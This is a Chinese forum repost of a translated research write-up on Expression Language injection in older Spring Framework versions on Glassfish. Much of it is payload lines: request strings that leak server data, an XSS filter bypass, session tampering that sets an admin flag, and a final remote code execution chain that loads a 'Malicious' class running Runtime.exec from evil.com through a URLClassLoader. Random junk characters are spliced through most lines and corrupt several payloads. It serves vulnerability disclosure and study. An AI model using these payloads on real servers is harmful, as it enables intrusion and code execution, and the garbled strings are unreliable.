找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2349|回复: 0
打印 上一主题 下一主题

spring-远程代码注入

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-16 21:47:24 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Remote Code with
" [2 D( n) @, W0 J1 TExpression Language Injection! j4 W6 Y  Z2 ?/ ?
Spring Framework脆弱性—DanAmodio
  C$ }/ ~. @/ \  X: p2 `( G全世界超过22,000组织已经下载了131.4万过时的Spring Framework,使用在业务中
$ l9 m" N& `0 N1 I可能会存在风险。6 l6 V/ C$ Z& k1 Q. E' A4 e% O
在2011年,来自Minded Security 的Stefano Di Paola 和来自Aspect Security的' Y' `* ~/ ]5 s( A8 {
Arshan Dabirsiaghi 在Spring Framework中发现了一个有趣模式。Stefano创造了Expression Language (EL) 注入。他们的发现披露了某些双重的解析EL 的spring 标签可4 \3 r4 _% c' E/ v/ F) y+ F
以泄露服务器上的敏感数据。这是由于spring 提供了独立于jsp/servlet容器的EL支持,& B3 Z5 R0 X$ H- R  @: g
以此来作为向下兼容的一种方式。因此在jsp2.0之前,EL 是不被支持的。这个功能在当前- A; \' H. ~8 n& v3 n0 F
版本中是默认打开的,应用程序使用了此模式描述是易受攻击的。
" _* z" h# v: h' d+ c1 I* F+ k# K由于每个应用程序并不都会出现反射xss这种弱点,虽然很难量化它的深度和广度,但
0 d) P2 T: L/ x4 h- X  Z我们根据Sonatype最新的统计知道,全世界超过22,000的组织下载Spring 3.0.5以下版$ w: O+ }6 n0 Y+ _
本已经超过131.4 万。Point-in-fact, one large retail organization consumed 241 different artifacts, 4,119 total downloads。
: y5 ^  B& F( V0 C这些版本不支持禁用double EL resolution.
! y# i3 U" K1 F  _: G9 L* j3 K8 \+ p这个问题原来的影响是信息泄露,但是我将举例说明它如何在Glassfish 和其他包含3 A3 z$ r; C& D, G% V5 p
EL2.2容器上可能进行远程代码执行。
( g7 _6 g5 [/ F) I0 t这是一个原始信息泄露的攻击例子:- d  M! K' H. y1 ~
请求:
- T: {. c- A9 Fttp://vulnerable.com/foo?message=${applicationScope}# Y) v' }) ?1 m) T
到达以下内容页面:1 o  H: W9 c7 W6 q# r7 Y
结果将输出一些包含内部服务器信息calsspath 和本地工作目录
% X- @; ]6 t5 ?: J# e: L5 E你也可以做一些其他事情,如这样:
3 ^7 L# h' E" M${9999+1}
! i1 I; V: x* s5 d  V& E+ m/ l6 [还可以访问session 对象和beans
* y/ c, A+ d) S${employee.lastName}
" M5 `2 A8 `! O- T0 v" a在执行Glassfish上客户端应用程序的渗透测试时,我遇到了同样的模式,知道大概是& m( h; M% {9 g" _- z. o
EL 注入,做了额外的测试后,确认了这一发现,同时延续下去,我想挖掘一些有滋味的东- r; a9 z  I* L8 I% I
西,比如XSS.2 D# B* J& k$ |4 q) v5 p
哎,应用程序的输入过滤终止了我的请求,因此去掉了””标签
6 D; V  N  {# O1 M+ e, X突发奇想,我想“我可以在JAVA中进行字符操纵,为什么我不试试利用EL来绕过过滤
! O8 N( M! h: m呢?”4 \9 t% j3 N/ A7 m& u" \; H
因此,我尝试巳缦拢�
) O! v' X9 |: b( V! ?8 e7 ghttp://vulnerable.com/app?code=${param.foo.replaceAll(“P”,”Q”)}foo=PPPP# x. m# E5 U9 I+ b- l% x
P
+ a2 W6 Q5 o, K( ]7 j) Z- _我注意到返回的错误代码时QQQQQ,由于String.replaceall 方法已经被调用,所以返
' L/ G- D, M/ I1 T. C3 `8 p- z- G回的文本被插入进了spring:message 标签。
' K- y, [6 O: t3 l3 [( k这里是一个最终绕过过滤的实例:
  c" ^0 }' Z) g8 bhttp://vulnerable.com/app?code=${param.foo.replaceAll(“P”,””)}&foo=PscriptQalert(1)/scriptQ* ^+ Y5 y9 l7 b8 n; `
它运行的很好,接下来一个小时我什么都没想。然后我认识到他是真的真的糟糕的。为% [- V5 x! N3 N5 J& ?
什么可以在EL中像这样插入方法。接下来,我还可以做些其他好玩的事情呢?6 Z- ^3 j* f' l
经过一番研究,我学习到EL2.2 增加了方法调用。
& A% _& `* [& L, Q# T; P# I* L我写了一个快速测试应用程序代码并且检测一些功能
8 e( J, F8 T2 g, X# E) N. F3 [8 o${pageContext.request.getSession().setAttribute(“account”,”123456″)}
5 l4 \# O) @7 ~! p% o7 x${pageContext.request.getSession().setAttribute(“admin”,true)}% M1 r7 c- T7 w3 D- G5 ^5 @
好了,会话对象修改是一个明显的风险。我真的想接触到对象,但是我没有一个直接的
# C3 q: k9 x8 G- [/ r) U指向pageContext对象,也许我可以使用反射,像String.getClass().forName(string)?/ i8 o8 _, C# y' N: W& e4 K
${“”.getClass().forName(“java.net.Socket”).newInstance().connect(“127.0.0.17 q# T7 ^5 n5 c% [- a' }/ T
“, 1234)}9 Y2 O" ~& |6 F" s2 R$ i( T0 I
${“”.getClass().forName(“java.lang.Runtime”)}& S7 r# Z# C5 A3 E0 h  F; |
哇,没有方法让它工作,由于可以接触到任何东西这可是灾难性的。不幸的是,它是不& F" W6 J0 d* }, r/ @
可能调用newinstance()初始化许多危险类(如Runtime),由于它们没有提供默认的构造函# X0 Y% ^) Q5 a7 T; x$ n* ?- A* L6 r
数,我们无法创建对象。当它请求null或者一个空数组,getMethods()[0].invoke()会有
( W0 ?/ [$ |! X# W3 \一些问题。在传递数据到方法之前,EL 似乎是理解它为一个字符串字面值。我猜测是由于5 B' D+ Y6 U* @2 A9 w; e* \0 w
方法签名invoke(Object obj, Object„ args)
' d' G' w$ A' a: S- e3 q% M9 mJeff Williams (Aspect Security 和OWASP核心创始人) ,Arshan,和我都思考这个问
3 K, i. B2 V& d- y! @# ]$ Y题,以让它可以工作起来。
; o+ ~# S$ Z( L) G' ]$ L3 B漏洞利用:* a% ]$ V- U% G1 \9 _1 q0 G
我在墙上撞的我的脑袋bangbang响,我已经用尽了所有想法,现在我们公开这个,我9 [7 O" I& k, q. \. r
希望你们中的一些JAVA奇才告诉我我是如此的可笑。
8 F& n2 [3 c2 `  i& x这里有一些我试过的失败的用例,为了试图让它工作的用例:2 N" D& w' T6 q( R+ m% L- g% L
 写文件到文件系统( x+ G7 \5 d2 |  Q/ z2 a$ K
 试图载入org.springframework.expression.spel.standard.SpelExpressionParser.% k# C" [4 w; f# M- H( ~
我认为这些可以很好的工作,但是我不能找到合适的类来载入。8 W5 P7 K( y# p' U0 C3 R  l
${pageContext.getClass().getClassLoader().loadClass(“org.springframework.expression.spel.standard.SpelExpressionParser”)}& `7 V2 D1 \& E4 c7 L  N
javax.servlet.jsp.el.ELException: java.lang.ClassNotFoundException:5 ]2 y$ q1 l9 k( Y3 R! b# @4 r4 r
org.springframework.expression.spel.standard.SpelExpressionParser not found
3 a3 `6 d) O4 Bby
2 h. d7 s% U" V8 a" x5 R' ^org.glassfish.web.javax.servlet.jsp [194].; t2 f4 g$ z5 c  P8 X" ]
 利用反射来修改java.lang.Runtime.currentRuntime的属性为Public, r" _6 }9 ]0 s& C
 利用反射来创建一个新的Runtime(and watch the world burn)
' l0 f7 @; S8 E4 \${pageContext.request.getSession().setAttribute(“rtc”,”".getClass().forName
) X" a- o5 T! f) W0 X7 y(“java.lang.Runtime”)).getDeclaredConstructors()[0])}# M. d  g& `3 b3 ^
${pageContext.request.getSession().getAttribute(“rtc”).setAccessible(true)}
; X( j6 Y8 g: ] 使用java.lang.ProcessBuilder
  V5 V- w8 ]& h% Q5 h, p- v4 h3 K* V 用表达式语言来评估表达式语言
; B5 ?  N- O* jExpression-ception ! 在这点我想我快疯了,载体并没有任何实际意义.
% v. {5 z& E! [# d0 J${pageContext.getExpressionEvaluator().parseExpression(“pageContext.request; _3 h& a$ o5 [' G
“,”".getClass(),null)}+ [. M. O" R+ X# M
 创建一个ObjectInputStream,序列化一个类并将其作为一个参数发送(也有点疯狂)1 k" G% i: ?3 ^( s1 w3 z3 [: q
我在使用一个空数组通过Method.invoke()时失败了很多次
; [# }' w4 W: y6 g7 c4 ?8 N% ?“”.getClass().forName(“java.lang.Runtime”).getMethods()[5].invoke(param.foo7 V; e1 m/ W1 F! m$ z
.getClass().forName(“java.lang.Runtime”),”".getClass().forName(“java.util.A/ q& }; I* y  J- ~% ^) G
rrayList”).newInstance().toArray())
* R2 _; J8 f+ \8 Ojava.lang.IllegalArgumentException: wrong number of arguments5 B, {2 Q$ d* C& }0 ^! o( b" e8 G
最后,有一天晚上我被绊倒在一个问题前:我能得到一个URLClassLoader,因此我可' |) ^7 @" y0 G6 R3 s
以创建一个恶意class文件并且指向类装载器.
9 _6 o5 L% S3 g7 D我写了一个JAVA 类,它试图打开服务器上的计算器,来证明远程代码执行:- o1 n& P1 R) u4 }5 j, ]! \$ T' f
public class Malicious {
8 p* l# H9 H8 d& F# m" \: qpublic Malicious() {& [4 m) A, E" m5 `5 Y9 S
try {$ }3 X% a% i# e
java.lang.Runtime.getRuntime().exec(“open -a Calculator”); //Mac% N. @7 X! C; {+ @* C5 ?" U
java.lang.Runtime.getRuntime().exec(“calc.exe”); //Win
: c2 C7 n0 u. T( A! K6 I} catch (Exception e) {) u  L+ R$ K) C( R6 C# d$ ]
}
* |, K- v' {6 l( z* i+ D$ l}
- k. X- x- Q) s% z- p( z, j0 n我们创建了一个数组列表将被用于构造一个新的URLClassLoader,它需要被存储在回
7 A/ P1 ~; p3 N: L话中,因此它可以被使用.
: K% ~% H4 @+ x& x+ _. @5 B${pageContext.request.getSession().setAttribute(“arr”,”".getClass().forName
  H- r  @+ o- d( G9 ?(“java.util.ArrayList”).newInstance())}
. e6 R* G2 ~- T# UURLClassLoader 提供了一个newInstance 方法,它接受URL对象数组。我们需要创建
' a% K2 Q' P3 K  r一个新的包含我们恶意代码路径的URL。ServletContext可以提供给我们一个URL对象和
' O6 x6 U% O4 W5 YgetResource(string) 方法,但是我们不可能直接创建一个新的实例。然而URI提供了一个
, H3 Q$ K# x% h我们可以调用的create(string)方法,然后转换对一个URL对象。
% m) x0 Y, o# t! m6 [8 p3 R${pageContext.request.getSession().getAttribute(“arr”).add(pageContext.getServletContext().getResource(“/”).toURI().create(“http://evil.com/path/to/wh
9 P6 F" k# `# I! k  Gere/malicious/classfile/is/located/”).toURL())}
) h# {8 j9 j+ w( N. F/ y" S然后我们发现了一个到URLClassLoader指示器,因此newInstance 方法可以被调用,( K+ z  f( U3 ^8 d4 C
恶意类文件被装载并创建,触发远程代码.. X; y' R, ~3 \! ]4 t6 x6 e3 k
${pageContext.getClass().getClassLoader().getParent().newInstance(pageConte$ R2 H7 S" w0 P; a0 I
xt.request.getSession().getAttribute(“arr”).toArray(pageContext.getClass().& N" ^+ Q9 _: `
getClassLoader().getParent().getURLs())).loadClass(“Malicious”).newInstance+ H% L& l8 U& z% @
()}
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表